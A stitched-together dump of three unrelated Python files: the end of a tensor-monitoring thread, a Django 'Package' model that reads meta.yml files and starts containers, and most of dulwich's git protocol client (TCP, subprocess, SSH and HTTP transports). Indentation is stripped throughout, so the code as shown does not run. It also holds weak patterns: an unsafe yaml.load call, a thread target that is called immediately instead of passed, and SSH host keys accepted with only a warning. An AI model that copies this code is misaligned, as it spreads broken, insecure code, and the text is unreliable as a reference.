while True:
self.running_lock.acquire()
if self.running == False:
break
if elapsed_secs < period_secs:
# TODO(guru4elephant): needs customized condition
time.sleep(1)
elapsed_secs += 1
else:
elapsed_secs = 0
fetch_dict = {}
for key in var_name_to_key:
var = scope.find_var(key)
fetch_dict[key] = var
if var == None:
local_logger.warning("{} value currently not available".
format(var_name_to_key[key]))
res_dict = {}
for key in fetch_dict:
user_name = var_name_to_key[key]
if fetch_dict[key] == None:
res_dict[user_name] = None
continue
else:
res_dict[user_name] = fetch_dict[key].get_tensor()
lod = res_dict[user_name].lod()
if len(lod) > 0:
raise RuntimeError("Some of your fetched tensors \
hold LoD information. \
They can not be completely cast \
to Python ndarray. We can \
not return LoDTensor itself directly, \
please choose another targets")
if res_dict[user_name]._is_initialized():
res_dict[user_name] = np.array(res_dict[user_name])
else:
res_dict[user_name] = None
fetch_instance.handler(res_dict)
self.running_lock.release()
def start(self):
"""
start monitor,
it will start a monitor thread.
"""
self.running_lock.acquire()
self.running = True
self.running_lock.release()
self.fetch_thread.setDaemon(True)
self.fetch_thread.start()
def stop(self):
self.running_lock.acquire()
self.running = False
self.running_lock.release()
|
package.py
|
import os
import threading
import uuid
import yaml
from django.db import models
from common.models import JsonTextField
from django.utils.translation import ugettext_lazy as _
from fit2ansible.settings import PACKAGE_DIR
from kubeops_api.package_manage import *
logger = logging.getLogger('kubeops')
__all__ = ['Package']
class Package(models.Model):
id = models.UUIDField(default=uuid.uuid4, primary_key=True)
name = models.CharField(max_length=20, unique=True, verbose_name=_('Name'))
meta = JsonTextField(blank=True, null=True, verbose_name=_('Meta'))
date_created = models.DateTimeField(auto_now_add=True, verbose_name=_('Date created'))
packages_dir = PACKAGE_DIR
def __str__(self):
return self.name
class Meta:
verbose_name = _('Package')
@property
def path(self):
return os.path.join(self.packages_dir, self.name)
@property
def repo_port(self):
return self.meta['vars']['repo_port']
@property
def registry_port(self):
return self.meta['vars']['registry_port']
@classmethod
def lookup(cls):
logger.info('lookup package...')
for d in os.listdir(cls.packages_dir):
full_path = os.path.join(cls.packages_dir, d)
meta_path = os.path.join(full_path, 'meta.yml')
if not os.path.isdir(full_path) or not os.path.isfile(meta_path):
continue
with open(meta_path) as f:
metadata = yaml.load(f)
defaults = {'name': d, 'meta': metadata}
logger.info('save package {}...'.format(d))
instance = cls.objects.update_or_create(defaults=defaults, name=d)[0]
thread = threading.Thread(target=cls.start_container(instance))
thread.start()
@classmethod
def start_container(cls, package):
if not is_package_container_exists(package.name):
create_package_container(package)
return
if not is_package_container_start(package.name):
start_package_container(package)
|
client.py
|
# client.py -- Implementation of the server side git protocols
# Copyright (C) 2008-2013 Jelmer Vernooij <jelmer@samba.org>
# Copyright (C) 2008 John Carr
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# or (at your option) a later version of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
"""Client side support for the Git protocol.
The Dulwich client supports the following capabilities:
* thin-pack
* multi_ack_detailed
* multi_ack
* side-band-64k
* ofs-delta
* report-status
* delete-refs
Known capabilities that are not supported:
* shallow
* no-progress
* include-tag
"""
__docformat__ = 'restructuredText'
from contextlib import closing
from io import BytesIO, BufferedReader
import dulwich
import select
import socket
import subprocess
import sys
try:
import urllib2
import urlparse
except ImportError:
import urllib.request as urllib2
import urllib.parse as urlparse
from dulwich.errors import (
GitProtocolError,
NotGitRepository,
SendPackError,
UpdateRefsError,
)
from dulwich.protocol import (
_RBUFSIZE,
CAPABILITY_DELETE_REFS,
CAPABILITY_MULTI_ACK,
CAPABILITY_MULTI_ACK_DETAILED,
CAPABILITY_OFS_DELTA,
CAPABILITY_REPORT_STATUS,
CAPABILITY_SIDE_BAND_64K,
CAPABILITY_THIN_PACK,
COMMAND_DONE,
COMMAND_HAVE,
COMMAND_WANT,
SIDE_BAND_CHANNEL_DATA,
SIDE_BAND_CHANNEL_PROGRESS,
SIDE_BAND_CHANNEL_FATAL,
PktLineParser,
Protocol,
ProtocolFile,
TCP_GIT_PORT,
ZERO_SHA,
extract_capabilities,
)
from dulwich.pack import (
write_pack_objects,
)
from dulwich.refs import (
read_info_refs,
)
def _fileno_can_read(fileno):
"""Check if a file descriptor is readable."""
return len(select.select([fileno], [], [], 0)[0]) > 0
COMMON_CAPABILITIES = [CAPABILITY_OFS_DELTA, CAPABILITY_SIDE_BAND_64K]
FETCH_CAPABILITIES = ([CAPABILITY_THIN_PACK, CAPABILITY_MULTI_ACK,
CAPABILITY_MULTI_ACK_DETAILED] +
COMMON_CAPABILITIES)
SEND_CAPABILITIES = [CAPABILITY_REPORT_STATUS] + COMMON_CAPABILITIES
class ReportStatusParser(object):
"""Handle status as reported by servers with 'report-status' capability.
"""
def __init__(self):
self._done = False
self._pack_status = None
self._ref_status_ok = True
self._ref_statuses = []
def check(self):
"""Check if there were any errors and, if so, raise exceptions.
:raise SendPackError: Raised when the server could not unpack
:raise UpdateRefsError: Raised when refs could not be updated
"""
if self._pack_status not in (b'unpack ok', None):
raise SendPackError(self._pack_status)
if not self._ref_status_ok:
ref_status = {}
ok = set()
for status in self._ref_statuses:
if b' ' not in status:
# malformed response, move on to the next one
continue
status, ref = status.split(b' ', 1)
if status == b'ng':
if b' ' in ref:
ref, status = ref.split(b' ', 1)
else:
ok.add(ref)
ref_status[ref] = status
# TODO(user): don't assume encoding of refs is ascii.
raise UpdateRefsError(', '.join([
ref.decode('ascii') for ref in ref_status if ref not in ok]) +
' failed to update', ref_status=ref_status)
def handle_packet(self, pkt):
"""Handle a packet.
:raise GitProtocolError: Raised when packets are received after a
flush packet.
"""
if self._done:
raise GitProtocolError("received more data after status report")
if pkt is None:
self._done = True
return
if self._pack_status is None:
self._pack_status = pkt.strip()
else:
ref_status = pkt.strip()
self._ref_statuses.append(ref_status)
if not ref_status.startswith(b'ok '):
self._ref_status_ok = False
def read_pkt_refs(proto):
server_capabilities = None
refs = {}
# Receive refs from server
for pkt in proto.read_pkt_seq():
(sha, ref) = pkt.rstrip(b'\n').split(None, 1)
if sha == b'ERR':
raise GitProtocolError(ref)
if server_capabilities is None:
(ref, server_capabilities) = extract_capabilities(ref)
refs[ref] = sha
if len(refs) == 0:
return None, set([])
return refs, set(server_capabilities)
# TODO(user): this doesn't correctly degrade if the server doesn't
# support some capabilities. This should work properly with servers
# that don't support multi_ack.
class GitClient(object):
"""Git smart server client.
"""
def __init__(self, thin_packs=True, report_activity=None):
"""Create a new GitClient instance.
:param thin_packs: Whether or not thin packs should be retrieved
:param report_activity: Optional callback for reporting transport
activity.
"""
self._report_activity = report_activity
self._report_status_parser = None
self._fetch_capabilities = set(FETCH_CAPABILITIES)
self._send_capabilities = set(SEND_CAPABILITIES)
if not thin_packs:
self._fetch_capabilities.remove(CAPABILITY_THIN_PACK)
def send_pack(self, path, determine_wants, generate_pack_contents,
progress=None, write_pack=write_pack_objects):
"""Upload a pack to a remote repository.
:param path: Repository path
:param generate_pack_contents: Function that can return a sequence of
the shas of the objects to upload.
:param progress: Optional progress function
:param write_pack: Function called with (file, iterable of objects) to
write the objects returned by generate_pack_contents to the server.
:raises SendPackError: if server rejects the pack data
:raises UpdateRefsError: if the server supports report-status
and rejects ref updates
"""
raise NotImplementedError(self.send_pack)
def fetch(self, path, target, determine_wants=None, progress=None):
"""Fetch into a target repository.
:param path: Path to fetch from
:param target: Target repository to fetch into
:param determine_wants: Optional function to determine what refs
to fetch
:param progress: Optional progress function
:return: remote refs as dictionary
"""
if determine_wants is None:
determine_wants = target.object_store.determine_wants_all
f, commit, abort = target.object_store.add_pack()
try:
result = self.fetch_pack(
path, determine_wants, target.get_graph_walker(), f.write,
progress)
except:
abort()
raise
else:
commit()
return result
def fetch_pack(self, path, determine_wants, graph_walker, pack_data,
progress=None):
"""Retrieve a pack from a git smart server.
:param determine_wants: Callback that returns list of commits to fetch
:param graph_walker: Object with next() and ack().
:param pack_data: Callback called for each bit of data in the pack
:param progress: Callback for progress reports (strings)
"""
raise NotImplementedError(self.fetch_pack)
def _parse_status_report(self, proto):
unpack = proto.read_pkt_line().strip()
if unpack != b'unpack ok':
st = True
# flush remaining error data
while st is not None:
st = proto.read_pkt_line()
raise SendPackError(unpack)
statuses = []
errs = False
ref_status = proto.read_pkt_line()
while ref_status:
ref_status = ref_status.strip()
statuses.append(ref_status)
if not ref_status.startswith(b'ok '):
errs = True
ref_status = proto.read_pkt_line()
if errs:
ref_status = {}
ok = set()
for status in statuses:
if b' ' not in status:
# malformed response, move on to the next one
continue
status, ref = status.split(b' ', 1)
if status == b'ng':
if b' ' in ref:
ref, status = ref.split(b' ', 1)
else:
ok.add(ref)
ref_status[ref] = status
raise UpdateRefsError(', '.join([ref for ref in ref_status
if ref not in ok]) +
b' failed to update',
ref_status=ref_status)
def _read_side_band64k_data(self, proto, channel_callbacks):
"""Read per-channel data.
This requires the side-band-64k capability.
:param proto: Protocol object to read from
:param channel_callbacks: Dictionary mapping channels to packet
handlers to use. None for a callback discards channel data.
"""
for pkt in proto.read_pkt_seq():
channel = ord(pkt[:1])
pkt = pkt[1:]
try:
cb = channel_callbacks[channel]
except KeyError:
raise AssertionError('Invalid sideband channel %d' % channel)
else:
if cb is not None:
cb(pkt)
def _handle_receive_pack_head(self, proto, capabilities, old_refs,
new_refs):
"""Handle the head of a 'git-receive-pack' request.
:param proto: Protocol object to read from
:param capabilities: List of negotiated capabilities
:param old_refs: Old refs, as received from the server
:param new_refs: New refs
:return: (have, want) tuple
"""
want = []
have = [x for x in old_refs.values() if not x == ZERO_SHA]
sent_capabilities = False
all_refs = set(new_refs.keys()).union(set(old_refs.keys()))
for refname in all_refs:
old_sha1 = old_refs.get(refname, ZERO_SHA)
new_sha1 = new_refs.get(refname, ZERO_SHA)
if old_sha1 != new_sha1:
if sent_capabilities:
proto.write_pkt_line(old_sha1 + b' ' + new_sha1 + b' ' + refname)
else:
proto.write_pkt_line(
old_sha1 + b' ' + new_sha1 + b' ' + refname + b'\0' +
b' '.join(capabilities))
sent_capabilities = True
if new_sha1 not in have and new_sha1 != ZERO_SHA:
want.append(new_sha1)
proto.write_pkt_line(None)
return (have, want)
def _handle_receive_pack_tail(self, proto, capabilities, progress=None):
"""Handle the tail of a 'git-receive-pack' request.
:param proto: Protocol object to read from
:param capabilities: List of negotiated capabilities
:param progress: Optional progress reporting function
"""
if b"side-band-64k" in capabilities:
if progress is None:
progress = lambda x: None
channel_callbacks = {2: progress}
if CAPABILITY_REPORT_STATUS in capabilities:
channel_callbacks[1] = PktLineParser(
self._report_status_parser.handle_packet).parse
self._read_side_band64k_data(proto, channel_callbacks)
else:
if CAPABILITY_REPORT_STATUS in capabilities:
for pkt in proto.read_pkt_seq():
self._report_status_parser.handle_packet(pkt)
if self._report_status_parser is not None:
self._report_status_parser.check()
def _handle_upload_pack_head(self, proto, capabilities, graph_walker,
wants, can_read):
"""Handle the head of a 'git-upload-pack' request.
:param proto: Protocol object to read from
:param capabilities: List of negotiated capabilities
:param graph_walker: GraphWalker instance to call .ack() on
:param wants: List of commits to fetch
:param can_read: function that returns a boolean that indicates
whether there is extra graph data to read on proto
"""
assert isinstance(wants, list) and isinstance(wants[0], bytes)
proto.write_pkt_line(COMMAND_WANT + b' ' + wants[0] + b' ' + b' '.join(capabilities) + b'\n')
for want in wants[1:]:
proto.write_pkt_line(COMMAND_WANT + b' ' + want + b'\n')
proto.write_pkt_line(None)
have = next(graph_walker)
while have:
proto.write_pkt_line(COMMAND_HAVE + b' ' + have + b'\n')
if can_read():
pkt = proto.read_pkt_line()
parts = pkt.rstrip(b'\n').split(b' ')
if parts[0] == b'ACK':
graph_walker.ack(parts[1])
if parts[2] in (b'continue', b'common'):
pass
elif parts[2] == b'ready':
break
else:
raise AssertionError(
"%s not in ('continue', 'ready', 'common)" %
parts[2])
have = next(graph_walker)
proto.write_pkt_line(COMMAND_DONE + b'\n')
def _handle_upload_pack_tail(self, proto, capabilities, graph_walker,
pack_data, progress=None, rbufsize=_RBUFSIZE):
"""Handle the tail of a 'git-upload-pack' request.
:param proto: Protocol object to read from
:param capabilities: List of negotiated capabilities
:param graph_walker: GraphWalker instance to call .ack() on
:param pack_data: Function to call with pack data
:param progress: Optional progress reporting function
:param rbufsize: Read buffer size
"""
pkt = proto.read_pkt_line()
while pkt:
parts = pkt.rstrip(b'\n').split(b' ')
if parts[0] == b'ACK':
graph_walker.ack(parts[1])
if len(parts) < 3 or parts[2] not in (
b'ready', b'continue', b'common'):
break
pkt = proto.read_pkt_line()
if CAPABILITY_SIDE_BAND_64K in capabilities:
if progress is None:
# Just ignore progress data
progress = lambda x: None
self._read_side_band64k_data(proto, {
SIDE_BAND_CHANNEL_DATA: pack_data,
SIDE_BAND_CHANNEL_PROGRESS: progress}
)
else:
while True:
data = proto.read(rbufsize)
if data == b"":
break
pack_data(data)
class TraditionalGitClient(GitClient):
"""Traditional Git client."""
def _connect(self, cmd, path):
"""Create a connection to the server.
This method is abstract - concrete implementations should
implement their own variant which connects to the server and
returns an initialized Protocol object with the service ready
for use and a can_read function which may be used to see if
reads would block.
:param cmd: The git service name to which we should connect.
:param path: The path we should pass to the service.
"""
raise NotImplementedError()
def send_pack(self, path, determine_wants, generate_pack_contents,
progress=None, write_pack=write_pack_objects):
"""Upload a pack to a remote repository.
:param path: Repository path
:param generate_pack_contents: Function that can return a sequence of
the shas of the objects to upload.
:param progress: Optional callback called with progress updates
:param write_pack: Function called with (file, iterable of objects) to
write the objects returned by generate_pack_contents to the server.
:raises SendPackError: if server rejects the pack data
:raises UpdateRefsError: if the server supports report-status
and rejects ref updates
"""
proto, unused_can_read = self._connect(b'receive-pack', path)
with proto:
old_refs, server_capabilities = read_pkt_refs(proto)
negotiated_capabilities = self._send_capabilities & server_capabilities
if CAPABILITY_REPORT_STATUS in negotiated_capabilities:
self._report_status_parser = ReportStatusParser()
report_status_parser = self._report_status_parser
try:
new_refs = orig_new_refs = determine_wants(dict(old_refs))
except:
proto.write_pkt_line(None)
raise
if not CAPABILITY_DELETE_REFS in server_capabilities:
# Server does not support deletions. Fail later.
new_refs = dict(orig_new_refs)
for ref, sha in orig_new_refs.items():
if sha == ZERO_SHA:
if CAPABILITY_REPORT_STATUS in negotiated_capabilities:
report_status_parser._ref_statuses.append(
b'ng ' + sha + b' remote does not support deleting refs')
report_status_parser._ref_status_ok = False
del new_refs[ref]
if new_refs is None:
proto.write_pkt_line(None)
return old_refs
if len(new_refs) == 0 and len(orig_new_refs):
# NOOP - Original new refs filtered out by policy
proto.write_pkt_line(None)
if report_status_parser is not None:
report_status_parser.check()
return old_refs
(have, want) = self._handle_receive_pack_head(
proto, negotiated_capabilities, old_refs, new_refs)
if not want and old_refs == new_refs:
return new_refs
objects = generate_pack_contents(have, want)
dowrite = len(objects) > 0
dowrite = dowrite or any(old_refs.get(ref) != sha
for (ref, sha) in new_refs.items()
if sha != ZERO_SHA)
if dowrite:
write_pack(proto.write_file(), objects)
self._handle_receive_pack_tail(
proto, negotiated_capabilities, progress)
return new_refs
def fetch_pack(self, path, determine_wants, graph_walker, pack_data,
progress=None):
"""Retrieve a pack from a git smart server.
:param determine_wants: Callback that returns list of commits to fetch
:param graph_walker: Object with next() and ack().
:param pack_data: Callback called for each bit of data in the pack
:param progress: Callback for progress reports (strings)
"""
proto, can_read = self._connect(b'upload-pack', path)
with proto:
refs, server_capabilities = read_pkt_refs(proto)
negotiated_capabilities = (
self._fetch_capabilities & server_capabilities)
if refs is None:
proto.write_pkt_line(None)
return refs
try:
wants = determine_wants(refs)
except:
proto.write_pkt_line(None)
raise
if wants is not None:
wants = [cid for cid in wants if cid != ZERO_SHA]
if not wants:
proto.write_pkt_line(None)
return refs
self._handle_upload_pack_head(
proto, negotiated_capabilities, graph_walker, wants, can_read)
self._handle_upload_pack_tail(
proto, negotiated_capabilities, graph_walker, pack_data, progress)
return refs
def archive(self, path, committish, write_data, progress=None,
write_error=None):
proto, can_read = self._connect(b'upload-archive', path)
with proto:
proto.write_pkt_line(b"argument " + committish)
proto.write_pkt_line(None)
pkt = proto.read_pkt_line()
if pkt == b"NACK\n":
return
elif pkt == b"ACK\n":
pass
elif pkt.startswith(b"ERR "):
raise GitProtocolError(pkt[4:].rstrip(b"\n"))
else:
raise AssertionError("invalid response %r" % pkt)
ret = proto.read_pkt_line()
if ret is not None:
raise AssertionError("expected pkt tail")
self._read_side_band64k_data(proto, {
SIDE_BAND_CHANNEL_DATA: write_data,
SIDE_BAND_CHANNEL_PROGRESS: progress,
SIDE_BAND_CHANNEL_FATAL: write_error})
class TCPGitClient(TraditionalGitClient):
"""A Git Client that works over TCP directly (i.e. git://)."""
def __init__(self, host, port=None, *args, **kwargs):
if port is None:
port = TCP_GIT_PORT
self._host = host
self._port = port
TraditionalGitClient.__init__(self, *args, **kwargs)
def _connect(self, cmd, path):
sockaddrs = socket.getaddrinfo(
self._host, self._port, socket.AF_UNSPEC, socket.SOCK_STREAM)
s = None
err = socket.error("no address found for %s" % self._host)
for (family, socktype, proto, canonname, sockaddr) in sockaddrs:
s = socket.socket(family, socktype, proto)
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
try:
s.connect(sockaddr)
break
except socket.error as err:
if s is not None:
s.close()
s = None
if s is None:
raise err
# -1 means system default buffering
rfile = s.makefile('rb', -1)
# 0 means unbuffered
wfile = s.makefile('wb', 0)
def close():
rfile.close()
wfile.close()
s.close()
proto = Protocol(rfile.read, wfile.write, close,
report_activity=self._report_activity)
if path.startswith(b"/~"):
path = path[1:]
proto.send_cmd(b'git-' + cmd, path, b'host=' + self._host)
return proto, lambda: _fileno_can_read(s)
class SubprocessWrapper(object):
"""A socket-like object that talks to a subprocess via pipes."""
def __init__(self, proc):
self.proc = proc
if sys.version_info[0] == 2:
self.read = proc.stdout.read
else:
self.read = BufferedReader(proc.stdout).read
self.write = proc.stdin.write
def can_read(self):
if subprocess.mswindows:
from msvcrt import get_osfhandle
from win32pipe import PeekNamedPipe
handle = get_osfhandle(self.proc.stdout.fileno())
data, total_bytes_avail, msg_bytes_left = PeekNamedPipe(handle, 0)
return total_bytes_avail != 0
else:
return _fileno_can_read(self.proc.stdout.fileno())
def close(self):
self.proc.stdin.close()
self.proc.stdout.close()
if self.proc.stderr:
self.proc.stderr.close()
self.proc.wait()
def find_git_command():
"""Find command to run for system Git (usually C Git).
"""
if sys.platform == 'win32': # support .exe, .bat and .cmd
try: # to avoid overhead
import win32api
except ImportError: # run through cmd.exe with some overhead
return ['cmd', '/c', 'git']
else:
status, git = win32api.FindExecutable('git')
return [git]
else:
return ['git']
class SubprocessGitClient(TraditionalGitClient):
"""Git client that talks to a server using a subprocess."""
def __init__(self, *args, **kwargs):
self._connection = None
self._stderr = None
self._stderr = kwargs.get('stderr')
if 'stderr' in kwargs:
del kwargs['stderr']
TraditionalGitClient.__init__(self, *args, **kwargs)
git_command = None
def _connect(self, service, path):
import subprocess
if self.git_command is None:
git_command = find_git_command()
argv = git_command + [service, path]
argv = ['git', service.decode('ascii'), path]
p = SubprocessWrapper(
subprocess.Popen(argv, bufsize=0, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=self._stderr))
return Protocol(p.read, p.write, p.close,
report_activity=self._report_activity), p.can_read
class LocalGitClient(GitClient):
"""Git Client that just uses a local Repo."""
def __init__(self, thin_packs=True, report_activity=None):
"""Create a new LocalGitClient instance.
:param path: Path to the local repository
:param thin_packs: Whether or not thin packs should be retrieved
:param report_activity: Optional callback for reporting transport
activity.
"""
self._report_activity = report_activity
# Ignore the thin_packs argument
def send_pack(self, path, determine_wants, generate_pack_contents,
progress=None, write_pack=write_pack_objects):
"""Upload a pack to a remote repository.
:param path: Repository path
:param generate_pack_contents: Function that can return a sequence of
the shas of the objects to upload.
:param progress: Optional progress function
:param write_pack: Function called with (file, iterable of objects) to
write the objects returned by generate_pack_contents to the server.
:raises SendPackError: if server rejects the pack data
:raises UpdateRefsError: if the server supports report-status
and rejects ref updates
"""
from dulwich.repo import Repo
with closing(Repo(path)) as target:
old_refs = target.get_refs()
new_refs = determine_wants(dict(old_refs))
have = [sha1 for sha1 in old_refs.values() if sha1 != ZERO_SHA]
want = []
all_refs = set(new_refs.keys()).union(set(old_refs.keys()))
for refname in all_refs:
old_sha1 = old_refs.get(refname, ZERO_SHA)
new_sha1 = new_refs.get(refname, ZERO_SHA)
if new_sha1 not in have and new_sha1 != ZERO_SHA:
want.append(new_sha1)
if not want and old_refs == new_refs:
return new_refs
target.object_store.add_objects(generate_pack_contents(have, want))
for name, sha in new_refs.items():
target.refs[name] = sha
return new_refs
def fetch(self, path, target, determine_wants=None, progress=None):
"""Fetch into a target repository.
:param path: Path to fetch from
:param target: Target repository to fetch into
:param determine_wants: Optional function to determine what refs
to fetch
:param progress: Optional progress function
:return: remote refs as dictionary
"""
from dulwich.repo import Repo
with closing(Repo(path)) as r:
return r.fetch(target, determine_wants=determine_wants,
progress=progress)
def fetch_pack(self, path, determine_wants, graph_walker, pack_data,
progress=None):
"""Retrieve a pack from a git smart server.
:param determine_wants: Callback that returns list of commits to fetch
:param graph_walker: Object with next() and ack().
:param pack_data: Callback called for each bit of data in the pack
:param progress: Callback for progress reports (strings)
"""
from dulwich.repo import Repo
with closing(Repo(path)) as r:
objects_iter = r.fetch_objects(determine_wants, graph_walker, progress)
# Did the process short-circuit (e.g. in a stateless RPC call)? Note
# that the client still expects a 0-object pack in most cases.
if objects_iter is None:
return
write_pack_objects(ProtocolFile(None, pack_data), objects_iter)
# What Git client to use for local access
default_local_git_client_cls = LocalGitClient
class SSHVendor(object):
"""A client side SSH implementation."""
def connect_ssh(self, host, command, username=None, port=None):
import warnings
warnings.warn(
"SSHVendor.connect_ssh has been renamed to SSHVendor.run_command",
DeprecationWarning)
return self.run_command(host, command, username=username, port=port)
def run_command(self, host, command, username=None, port=None):
"""Connect to an SSH server.
Run a command remotely and return a file-like object for interaction
with the remote command.
:param host: Host name
:param command: Command to run
:param username: Optional ame of user to log in as
:param port: Optional SSH port to use
"""
raise NotImplementedError(self.run_command)
class SubprocessSSHVendor(SSHVendor):
"""SSH vendor that shells out to the local 'ssh' command."""
def run_command(self, host, command, username=None, port=None):
import subprocess
#FIXME: This has no way to deal with passwords..
args = ['ssh', '-x']
if port is not None:
args.extend(['-p', str(port)])
if username is not None:
host = '%s@%s' % (username, host)
args.append(host)
proc = subprocess.Popen(args + command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
return SubprocessWrapper(proc)
try:
import paramiko
except ImportError:
pass
else:
import threading
class ParamikoWrapper(object):
STDERR_READ_N = 2048 # 2k
def __init__(self, client, channel, progress_stderr=None):
self.client = client
self.channel = channel
self.progress_stderr = progress_stderr
self.should_monitor = bool(progress_stderr) or True
self.monitor_thread = None
self.stderr = ''
# Channel must block
self.channel.setblocking(True)
# Start
if self.should_monitor:
self.monitor_thread = threading.Thread(
target=self.monitor_stderr)
self.monitor_thread.start()
def monitor_stderr(self):
while self.should_monitor:
# Block and read
data = self.read_stderr(self.STDERR_READ_N)
# Socket closed
if not data:
self.should_monitor = False
break
# Emit data
if self.progress_stderr:
self.progress_stderr(data)
# Append to buffer
self.stderr += data
def stop_monitoring(self):
# Stop StdErr thread
if self.should_monitor:
self.should_monitor = False
self.monitor_thread.join()
# Get left over data
data = self.channel.in_stderr_buffer.empty()
self.stderr += data
def can_read(self):
return self.channel.recv_ready()
def write(self, data):
return self.channel.sendall(data)
def read_stderr(self, n):
return self.channel.recv_stderr(n)
def read(self, n=None):
data = self.channel.recv(n)
data_len = len(data)
# Closed socket
if not data:
return
# Read more if needed
if n and data_len < n:
diff_len = n - data_len
return data + self.read(diff_len)
return data
def close(self):
self.channel.close()
self.stop_monitoring()
class ParamikoSSHVendor(object):
def __init__(self):
self.ssh_kwargs = {}
self.missing_host_policy = paramiko.client.WarningPolicy()
def run_command(self, host, command, username=None, port=None,
progress_stderr=None):
# Paramiko needs an explicit port. None is not valid
if port is None:
port = 22
client = paramiko.SSHClient()
client.set_missing_host_key_policy(self.missing_host_policy)
client.connect(host, username=username, port=port,
**self.ssh_kwargs)
# Open SSH session
channel = client.get_transport().open_session()
# Run commands
channel.exec_command(*command)
return ParamikoWrapper(
client, channel, progress_stderr=progress_stderr)
# Can be overridden by users
get_ssh_vendor = SubprocessSSHVendor
class SSHGitClient(TraditionalGitClient):
def __init__(self, host, port=None, username=None, *args, **kwargs):
self.host = host
self.port = port
self.username = username
TraditionalGitClient.__init__(self, *args, **kwargs)
self.alternative_paths = {}
def _get_cmd_path(self, cmd):
cmd = cmd.decode('ascii')
return self.alternative_paths.get(cmd, 'git-' + cmd)
def _connect(self, cmd, path):
if path.startswith("/~"):
path = path[1:]
con = get_ssh_vendor().run_command(
self.host, [self._get_cmd_path(cmd), path],
port=self.port, username=self.username)
return (Protocol(con.read, con.write, con.close,
report_activity=self._report_activity),
con.can_read)
def default_user_agent_string():
return "dulwich/%s" % ".".join([str(x) for x in dulwich.__version__])
def default_urllib2_opener(config):
if config is not None:
proxy_server = config.get("http", "proxy")
else:
proxy_server = None
handlers = []
if proxy_server is not None:
handlers.append(urllib2.ProxyHandler({"http": proxy_server}))
opener = urllib2.build_opener(*handlers)
if config is not None:
user_agent = config.get("http", "useragent")
else:
user_agent = None
if user_agent is None:
user_agent = default_user_agent_string()
opener.addheaders = [('User-agent', user_agent)]
return opener
class HttpGitClient(GitClient):
def __init__(self, base_url, dumb=None, opener=None, config=None, *args,
**kwargs):
self.base_url = base_url.rstrip("/") + "/"
self.dumb = dumb
if opener is None:
self.opener = default_urllib2_opener(config)
else:
self.opener = opener
GitClient.__init__(self, *args, **kwargs)
def __repr__(self):
return "%s(%r, dumb=%r)" % (type(self).__name__, self.base_url, self.dumb)
def _get_url(self, path):
return urlparse.urljoin(self.base_url, path).rstrip("/") + "/"
def _http_request(self, url, headers={}, data=None):
req = urllib2.Request(url, headers=headers, data=data)
try:
resp = self.opener.open(req)
except urllib2.HTTPError as e:
if e.code == 404:
raise NotGitRepository()
if e.code != 200:
raise GitProtocolError("unexpected http response %d" % e.code)
return resp
def _discover_references(self, service, url):
assert url[-1] == "/"
url = urlparse.urljoin(url, "info/refs")
headers = {}
if self.dumb is not False:
url += "?service=%s" % service
headers["Content-Type"] = "application/x-%s-request" % service
resp = self._http_request(url, headers)
try:
self.dumb = (not resp.info().gettype().startswith("application/x-git-"))
if not self.dumb:
proto = Protocol(resp.read, None)
# The first line should mention the service
pkts = list(proto.read_pkt_seq())
if pkts != [('# service=%s\n' % service)]:
raise GitProtocolError(
"unexpected first line %r from smart server" % pkts)
return read_pkt_refs(proto)
else:
return read_info_refs(resp), set()
finally:
resp.close()
def _smart_request(self, service, url, data):
assert url[-1] == "/"
url = urlparse.urljoin(url, service)
headers = {"Content-Type": "application/x-%s-request" % service}
resp = self._http_request(url, headers, data)
if resp.info().gettype() != ("application/x-%s-result" % service):
raise GitProtocolError("Invalid content-type from server: %s"
% resp.info().gettype())
return resp
def send_pack(self, path, determine_wants, generate_pack_contents,
progress=None, write_pack=write_pack_objects):
"""Upload a pack to a remote repository.
:param path: Repository path
:param generate_pack_contents: Function that can return a sequence of
the shas of the objects to upload.
:param progress: Optional progress function
:param write_pack: Function called with (file, iterable of objects) to
write the objects returned by generate_pack_contents to the server.
:raises SendPackError: if server rejects the pack data
:raises UpdateRefsError: if the server supports report-status
and rejects ref updates
"""
url = self._get_url(path)
old_refs, server_capabilities = self._discover_references(
b"git-receive-pack", url)
negotiated_capabilities = self._send_capabilities & server_capabilities
if CAPABILITY_REPORT_STATUS in negotiated_capabilities:
self._report_status_parser = ReportStatusParser()
new_refs = determine_wants(dict(old_refs))
if new_refs is None:
return old_refs
if self.dumb:
raise NotImplementedError(self.fetch_pack)
req_data = BytesIO()
req_proto = Protocol(None, req_data.write)
(have, want) = self._handle_receive_pack_head(
req_proto, negotiated_capabilities, old_refs, new_refs)
if not want and old_refs == new_refs:
return new_refs
objects = generate_pack_contents(have, want)
if len(objects) > 0:
write_pack(req_proto.write_file(), objects)
resp = self._smart_request(b"git-receive-pack", url,
data=req_data.getvalue())
try:
resp_proto = Protocol(resp.read, None)
self._handle_receive_pack_tail(resp_proto, negotiated_capabilities,
progress)
return new_refs
finally:
resp.close()
def fetch_pack(self, path, determine_wants, graph_walker, pack_data,
progress=None):
"""Retrieve a pack from a git smart server.
:param determine_wants: Callback that returns list of commits to fetch
:param graph_walker: Object with next() and ack().
:param pack_data: Callback called for each bit of data in the pack
:param progress: Callback for progress reports (strings)
:return: Dictionary with the refs of the remote repository
"""
url = self._get_url(path)
refs, server_capabilities = self._discover_references(
b"git-upload-pack", url)
negotiated_capabilities = self._fetch_capabilities & server_capabilities
wants = determine_wants(refs)
if wants is not None:
wants = [cid for cid in wants if cid != ZERO_SHA]
if not wants:
return refs
if self.dumb:
raise NotImplementedError(self.send_pack)
req_data = BytesIO()
req_proto = Protocol(None, req_data.write)
self._handle_upload_pack_head(
req_proto, negotiated_capabilities, graph_walker, wants,
lambda: False)
resp = self._smart_request(
b"git-upload-pack", url, data=req_data.getvalue())
try:
resp_proto = Protocol(resp.read, None)
self._handle_upload_pack_tail(resp_proto, negotiated_capabilities,
graph_walker, pack_data, progress)
return refs
finally:
resp.close()
def get_transport_and_path_from_url(url, config=None, **kwargs):
"""Obtain a git client from a URL.
:param url: URL to open
:param config: Optional config object
